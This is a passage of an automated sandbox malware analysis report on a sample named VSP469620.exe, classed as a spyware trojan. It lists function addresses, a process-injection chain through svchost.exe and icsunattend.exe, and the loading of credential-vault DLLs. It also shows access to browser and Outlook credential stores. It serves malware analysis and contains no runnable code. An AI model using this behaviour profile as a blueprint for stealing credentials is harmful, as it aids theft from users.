                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325FB804_2_0325FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B5BF04_2_032B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0327DBF94_2_0327DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B3A6C4_2_032B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FFA494_2_032FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F7A464_2_032F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DDAAC4_2_032DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03285AA04_2_03285AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E1AA34_2_032E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032EDAC64_2_032EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D59104_2_032D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032499504_2_03249950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325B9504_2_0325B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AD8004_2_032AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032438E04_2_032438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FFF094_2_032FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FFFB14_2_032FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03241F924_2_03241F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03203FD24_2_03203FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03203FD54_2_03203FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03249EB04_2_03249EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F7D734_2_032F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03243D404_2_03243D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F1D5A4_2_032F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325FDC04_2_0325FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B9C324_2_032B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FFCF24_2_032FFCF2
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046024467_2_04602446
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045F44207_2_045F4420
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045FE4F67_2_045FE4F6
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045505357_2_04550535
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046105917_2_04610591
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0456C6E07_2_0456C6E0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045747507_2_04574750
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045507707_2_04550770
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0454C7C07_2_0454C7C0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045E20007_2_045E2000
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045D81587_2_045D8158
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045EA1187_2_045EA118
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045401007_2_04540100
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046081CC7_2_046081CC
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046041A27_2_046041A2
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046101AA7_2_046101AA
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045F02747_2_045F0274
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045D02C07_2_045D02C0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460A3527_2_0460A352
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046103E67_2_046103E6
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0455E3F07_2_0455E3F0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04550C007_2_04550C00
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04540CF27_2_04540CF2
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045F0CB57_2_045F0CB5
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045ECD1F7_2_045ECD1F
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0455AD007_2_0455AD00
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0454ADE07_2_0454ADE0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04568DBF7_2_04568DBF
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04550E597_2_04550E59
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460EE267_2_0460EE26
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460EEDB7_2_0460EEDB
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04562E907_2_04562E90
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460CE937_2_0460CE93
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045C4F407_2_045C4F40
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04570F307_2_04570F30
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045F2F307_2_045F2F30
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04592F287_2_04592F28
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04542FC87_2_04542FC8
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0455CFE07_2_0455CFE0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045CEFA07_2_045CEFA0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0455A8407_2_0455A840
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045528407_2_04552840
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0457E8F07_2_0457E8F0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045368B87_2_045368B8
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045669627_2_04566962
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0461A9A67_2_0461A9A6
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045529A07_2_045529A0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0454EA807_2_0454EA80
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460AB407_2_0460AB40
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04606BD77_2_04606BD7
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045414607_2_04541460
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460F43F7_2_0460F43F
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046075717_2_04607571
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046195C37_2_046195C3
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045ED5B07_2_045ED5B0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045956307_2_04595630
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046016CC7_2_046016CC
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045417EC7_2_045417EC
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460F7B07_2_0460F7B0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460F0E07_2_0460F0E0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046070E97_2_046070E9
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045FF0CC7_2_045FF0CC
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045570C07_2_045570C0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0461B16B7_2_0461B16B
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0453F1727_2_0453F172
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0458516C7_2_0458516C
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0455B1B07_2_0455B1B0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0456B2C07_2_0456B2C0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045F12ED7_2_045F12ED
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045552A07_2_045552A0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0453D34C7_2_0453D34C
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460132D7_2_0460132D
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0459739A7_2_0459739A
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045C9C327_2_045C9C32
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460FCF27_2_0460FCF2
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04607D737_2_04607D73
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04553D407_2_04553D40
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04601D5A7_2_04601D5A
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0456FDC07_2_0456FDC0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04559EB07_2_04559EB0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460FF097_2_0460FF09
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04513FD27_2_04513FD2
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04513FD57_2_04513FD5
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04551F927_2_04551F92
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460FFB17_2_0460FFB1
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045BD8007_2_045BD800
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045538E07_2_045538E0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045599507_2_04559950
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0456B9507_2_0456B950
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045E59107_2_045E5910
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04607A467_2_04607A46
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460FA497_2_0460FA49
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045C3A6C7_2_045C3A6C
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045FDAC67_2_045FDAC6
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045EDAAC7_2_045EDAAC
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04595AA07_2_04595AA0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045F1AA37_2_045F1AA3
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460FB767_2_0460FB76
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0458DBF97_2_0458DBF9
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045C5BF07_2_045C5BF0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0456FB807_2_0456FB80
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_00361E207_2_00361E20
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0035CCF97_2_0035CCF9
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0035CD007_2_0035CD00
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0035CF207_2_0035CF20
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0035AF007_2_0035AF00
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0035B0507_2_0035B050
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0035B0457_2_0035B045
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_003655007_2_00365500
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_003637027_2_00363702
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_003637007_2_00363700
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0037BCB07_2_0037BCB0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0436E4C47_2_0436E4C4
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0436E3A47_2_0436E3A4
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0436E8687_2_0436E868
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0436E85C7_2_0436E85C
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0436D8F47_2_0436D8F4
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0436D9287_2_0436D928
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B970 appears 283 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287E54 appears 109 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BF290 appears 105 times
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: String function: 04597E54 appears 109 times
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: String function: 045CF290 appears 105 times
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: String function: 0453B970 appears 283 times
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: String function: 04585130 appears 58 times
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: String function: 045BEA12 appears 86 times
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: String function: 00ACEC2F appears 68 times
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: String function: 00ADF8A0 appears 35 times
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: String function: 00AD6AC0 appears 42 times
                Source: VSP469620.exe, 00000002.00000003.1302309170.0000000003BAD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs VSP469620.exe
                Source: VSP469620.exe, 00000002.00000003.1301002038.00000000039B3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs VSP469620.exe
                Source: VSP469620.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@14/6
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AFCE7A GetLastError,FormatMessageW,2_2_00AFCE7A
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AEAB84 AdjustTokenPrivileges,CloseHandle,2_2_00AEAB84
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AEB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00AEB134
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AFE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_00AFE1FD
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AF6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,2_2_00AF6532
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B0C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,2_2_00B0C18C
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AB406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,2_2_00AB406B
                Source: C:\Users\user\Desktop\VSP469620.exeFile created: C:\Users\user\AppData\Local\Temp\aut4E21.tmpJump to behavior
                Source: VSP469620.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\VSP469620.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: icsunattend.exe, 00000007.00000002.3142248419.00000000028D3000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000003.2004604015.00000000028D3000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000003.2004452213.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3142248419.00000000028FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: VSP469620.exeReversingLabs: Detection: 63%
                Source: VSP469620.exeVirustotal: Detection: 64%
                Source: unknownProcess created: C:\Users\user\Desktop\VSP469620.exe "C:\Users\user\Desktop\VSP469620.exe"
                Source: C:\Users\user\Desktop\VSP469620.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\VSP469620.exe"
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeProcess created: C:\Windows\SysWOW64\icsunattend.exe "C:\Windows\SysWOW64\icsunattend.exe"
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\VSP469620.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\VSP469620.exe"Jump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeProcess created: C:\Windows\SysWOW64\icsunattend.exe "C:\Windows\SysWOW64\icsunattend.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\VSP469620.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\VSP469620.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\VSP469620.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\VSP469620.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\VSP469620.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\VSP469620.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\VSP469620.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\VSP469620.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\VSP469620.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\VSP469620.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\VSP469620.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\VSP469620.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\VSP469620.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: VSP469620.exeStatic file information: File size 1207808 > 1048576
                Source: VSP469620.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: VSP469620.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: VSP469620.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: VSP469620.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: VSP469620.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: VSP469620.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: VSP469620.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VgGNmkZfWSSE.exe, 00000006.00000000.1738250337.000000000074E000.00000002.00000001.01000000.00000005.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3141773631.000000000074E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: VSP469620.exe, 00000002.00000003.1302642095.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, VSP469620.exe, 00000002.00000003.1300070020.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1717413410.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1715037623.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818888333.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818888333.000000000339E000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000003.1818867931.00000000041BD000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000003.1821159790.0000000004369000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3144448252.00000000046AE000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3144448252.0000000004510000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: VSP469620.exe, 00000002.00000003.1302642095.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, VSP469620.exe, 00000002.00000003.1300070020.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000003.1717413410.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1715037623.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818888333.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818888333.000000000339E000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, icsunattend.exe, 00000007.00000003.1818867931.00000000041BD000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000003.1821159790.0000000004369000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3144448252.00000000046AE000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3144448252.0000000004510000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: icsunattend.pdbGCTL source: svchost.exe, 00000004.00000002.1818680712.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818663703.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, VgGNmkZfWSSE.exe, 00000006.00000002.3143693434.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: icsunattend.pdb source: svchost.exe, 00000004.00000002.1818680712.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818663703.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, VgGNmkZfWSSE.exe, 00000006.00000002.3143693434.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: icsunattend.exe, 00000007.00000002.3142248419.0000000002856000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3145271641.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000000.1887577336.0000000002CDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2115971735.0000000026E9C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: icsunattend.exe, 00000007.00000002.3142248419.0000000002856000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3145271641.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000000.1887577336.0000000002CDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2115971735.0000000026E9C000.00000004.80000000.00040000.00000000.sdmp
                Source: VSP469620.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: VSP469620.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: VSP469620.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
